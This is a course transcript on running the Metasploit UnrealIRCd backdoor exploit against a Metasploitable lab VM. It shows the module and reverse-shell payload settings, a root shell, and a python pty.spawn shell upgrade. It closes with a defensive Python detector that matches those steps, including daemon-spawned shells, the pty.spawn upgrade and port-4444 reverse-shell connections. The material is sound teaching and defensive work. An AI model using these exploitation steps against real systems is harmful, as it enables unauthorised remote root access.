From the course: Kali Linux Essential Training
Exploiting Linux with Metasploit - Linux Tutorial
- [Instructor] Let's see how we run exploits with Metasploit. We can select it from our favorites. Enter our password. And the Metasploit framework starts up. Metasploit includes a database of testing modules and payloads, including the Meterpreter, a payload which provides a powerful remote shell. We can see that it has over 2,000 exploits and 1,391 payloads in its database right now, as well as a number of other modules. Exploit modules are run against a target system to check whether it's vulnerable, and payloads are sent into a target system to demonstrate that the exploit was successful by executing on the target.

The help command shows all the commands that we can issue in Metasploit. There are a lot of commands we can use, grouped into core, module, job, resource, and various backend sections. We'll take a look at some of them now. We've already seen how we can search for exploits with the search command. For instance, search win8 provides the one exploit for Windows 8. We can also enter search windows -S date, and this provides a lot more Windows exploits sorted by date. These aren't necessarily due to vulnerabilities in the Windows operating system, as we can see by the latest listed, which is related to the Apache ActiveMQ vulnerability.

Let's try an exploit against the Metasploitable system. We'll start by searching for IRC vulnerabilities. Okay, there's a range of exploits for DOS, Windows, Unix and so on. Let's select the Unix exploit called exploit/unix/irc/unreal_ircd_3281_backdoor. We'll copy the name of the exploit and put it into the use command. Okay, we've loaded the exploit. Let's check the targets this exploit works against by saying show targets. In this case, the exploit can determine what kind of target it has, so we can select automatic: set target 0, which is the default. Let's have a look now at what payloads we can use with this exploit. Show payloads, and there's a number of command shells and a generic command execution.
We can use the info command to get more information on the reverse shell. So let's have a look at cmd/unix/reverse, and this creates an interactive shell on port 4444. This doesn't need administrative privileges, so let's go select it: set payload cmd/unix/reverse. Now let's see what options we need to set to use this combination of exploit and payload: show options. We have to set the remote and local host addresses. The remote address for our Metasploitable system is set rhosts 10.0.2.32, and the local host is the Kali system we're running on, which is set lhost 10.0.2.100. Okay, let's run the exploit by saying exploit.

A command shell has now been established on the remote system. The first thing we'll do is check who we are on the remote system: whoami. Okay, we're on the remote system as root. Well, that's pretty cool. But it's a bit disconcerting not having a normal prompt. There's a little trick we can use to sort that out. We'll open a full bash shell using Python. All we need to do is enter python -c, import pty;pty.spawn, and what we're going to spawn is /bin/bash. And now we have a prompt. We can now do whatever we would normally do with remote access to the system. For instance, we can list processes. We've exploited Metasploitable using an IRC exploit and now have complete root control. When we finish testing, we can enter Control-C to terminate the remote shell.
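The session above leaves a recognisable trail on the Metasploitable host: an IRC daemon forks a shell, that shell connects back to the Kali box on port 4444, and the operator then runs the python pty.spawn one-liner to get a proper prompt. The following is an added example, not part of the course or of Metasploit, showing how a defender could flag that chain from process and connection telemetry. The event records, the daemon list (NETWORK_DAEMONS) and the Event class are all constructed for this example and are not the output or schema of any real auditing tool.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumed for this example: daemons that should never fork an interactive shell.
# A real deployment tunes this to the services it actually runs.
NETWORK_DAEMONS = {"ircd", "unrealircd"}
# Interpreters and shells an attacker lands in after a command-execution payload.
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl"}
# Metasploit's default handler port, used by cmd/unix/reverse in the video.
SUSPECT_PORTS = {4444}
# The TTY upgrade one-liner from the video leaves this in the process command line.
PTY_SPAWN = re.compile(r"import\s+pty\s*;\s*pty\.spawn\(")


@dataclass
class Event:
    """One constructed telemetry record: a process exec or an outbound connect."""
    kind: str                    # "exec" or "connect"
    pid: int
    ppid: int
    comm: str                    # executable name
    cmdline: str = ""
    remote_port: Optional[int] = None


def ancestor_comms(exec_by_pid: dict, pid: int, limit: int = 32) -> List[str]:
    """Return the executable names of pid's ancestors, nearest first."""
    out = []
    while limit and pid in exec_by_pid:
        pid = exec_by_pid[pid].ppid
        if pid in exec_by_pid:
            out.append(exec_by_pid[pid].comm)
        limit -= 1
    return out


def detect(events: List[Event]) -> List[Tuple[str, int]]:
    """Apply three rules and return (rule_name, pid) alerts in event order."""
    exec_by_pid = {e.pid: e for e in events if e.kind == "exec"}
    alerts = []
    for e in events:
        from_daemon = any(c in NETWORK_DAEMONS for c in ancestor_comms(exec_by_pid, e.pid))
        # Rule 1: a network daemon (or its descendants) spawned a shell/interpreter.
        if e.kind == "exec" and e.comm in SHELL_LIKE and from_daemon:
            alerts.append(("daemon_spawned_shell", e.pid))
        # Rule 2: the pty.spawn TTY upgrade, a post-exploitation tell regardless of parent.
        if e.kind == "exec" and PTY_SPAWN.search(e.cmdline):
            alerts.append(("pty_shell_upgrade", e.pid))
        # Rule 3: a shell, or anything under a daemon, dialling out to a handler port.
        if e.kind == "connect" and e.remote_port in SUSPECT_PORTS and (from_daemon or e.comm in SHELL_LIKE):
            alerts.append(("reverse_shell_connect", e.pid))
    return alerts


# Constructed sample telemetry mirroring the session in the video, plus a benign
# sshd login shell that must not fire.
SAMPLE_EVENTS = [
    Event("exec", 1200, 1, "ircd", "/usr/bin/ircd"),
    Event("exec", 1201, 1200, "sh", "/bin/sh"),
    Event("connect", 1201, 1200, "sh", remote_port=4444),
    Event("exec", 1202, 1201, "python", 'python -c import pty;pty.spawn("/bin/bash")'),
    Event("exec", 1203, 1202, "bash", "/bin/bash"),
    Event("exec", 2000, 1, "sshd", "/usr/sbin/sshd"),
    Event("exec", 2001, 2000, "bash", "-bash"),
    Event("connect", 2001, 2000, "bash", remote_port=443),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"ALERT {rule} pid={pid}")
```

The ancestry walk is what gives the rule its precision: a login shell under sshd is normal, while any shell whose lineage passes through ircd is not, and the port-4444 rule only fires when that lineage or a shell-like executable is involved, so ordinary service traffic on the same port is ignored.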